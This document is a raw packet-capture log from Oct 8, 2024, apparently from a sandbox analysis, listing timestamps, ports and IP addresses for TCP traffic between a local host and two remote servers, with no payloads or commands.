Oct 8, 2024 20:47:31.359240055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359250069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359276056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359282970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359322071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359359026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359410048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359426975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359460115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359469891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359508991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359519958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359553099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359565020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359586954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359599113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359621048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359632015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359654903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359668016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359688997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359700918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359724045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359735012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359760046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359771967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359803915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359875917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359909058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359921932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359941959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359954119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359977007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359991074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360011101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360023975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360044956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360055923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360080004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360090017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360114098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360124111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360147953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360158920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360181093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360192060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360225916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360238075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360272884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360284090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360306025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360316992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360338926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360348940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360373020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360383034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360405922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360416889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360440016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360451937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360479116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360485077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360526085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360595942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360629082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360642910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360661983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360672951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360697031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360706091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360742092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360749006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360784054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360800028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360822916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360837936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360871077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360882044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360904932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360915899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360938072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360955000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.360971928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.360982895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361006021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361016989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361041069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361052990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361073971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361084938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361108065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361118078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361141920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361154079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361180067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361186981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361217022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361224890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361249924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361260891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361284971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361294985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361318111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361327887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361356974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.361361980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.361397982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.379570007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.384371996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.400614977 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.401329994 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.401401997 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.401870966 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.401884079 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.496714115 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.497304916 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.497328043 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.497646093 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.497656107 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.505208969 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.505403996 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.505469084 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.505513906 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.505513906 CEST	49823	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.505544901 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.505565882 CEST	443	49823	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.508074045 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.508100033 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.508163929 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.508282900 CEST	49828	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.508290052 CEST	443	49828	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.603955984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.603976011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.603985071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604111910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604124069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604132891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604145050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604240894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604240894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604266882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604276896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604285955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604307890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604314089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604320049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604330063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604331970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604342937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604363918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604391098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604568958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604614019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604643106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604655027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604662895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604674101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604684114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604686975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604693890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604706049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604734898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604928017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604938984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604948044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604957104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604976892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.604983091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.604995012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605003119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605004072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605016947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605027914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605034113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605041027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605048895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605076075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605098963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605437040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605447054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605456114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605467081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605477095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605487108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605488062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605498075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605511904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605515957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605535984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605546951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605711937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605756998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605885983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605896950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605906963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605916977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605927944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605928898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605938911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605947971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605957031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605957985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605969906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605972052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.605979919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605990887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.605998039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606003046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606028080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606046915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606512070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606522083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606530905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606539965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606551886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606554031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606561899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606573105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606583118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606583118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606594086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606605053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606605053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606615067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606623888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606625080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606635094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606645107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606645107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606656075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606662035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606667042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606676102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606679916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606687069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.606698036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606714010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.606739044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607316017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607326984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607342958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607353926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607357979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607364893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607374907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607376099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607381105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607393026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607400894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607410908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607420921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607430935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607433081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607441902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607454062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607458115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607464075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607475042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607484102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607486010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607496023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607497931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607510090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607521057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607523918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607532978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607544899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.607548952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607563019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.607588053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608350039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608361006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608370066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608381987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608392000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608395100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608402014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608409882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608412981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608422041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608433962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608445883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608447075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608457088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608465910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608467102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608479023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608483076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608489990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608500957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608510017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608510971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608519077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608527899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608536005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608536959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608546019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608556032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608557940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608567953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608571053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608593941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608620882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.608975887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608984947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608989954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.608999968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.609010935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.609030008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.609056950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.632622957 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.632781029 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.632930994 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.632962942 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.632980108 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.633002043 CEST	49824	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.633014917 CEST	443	49824	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.635642052 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.635715961 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.635807037 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.635931969 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.635951042 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.690817118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.690859079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.690860987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.690871000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.690898895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.690912008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691118956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691128969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691140890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691150904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691155910 CEST	49755	80	192.168.2.5	95.164.90.97
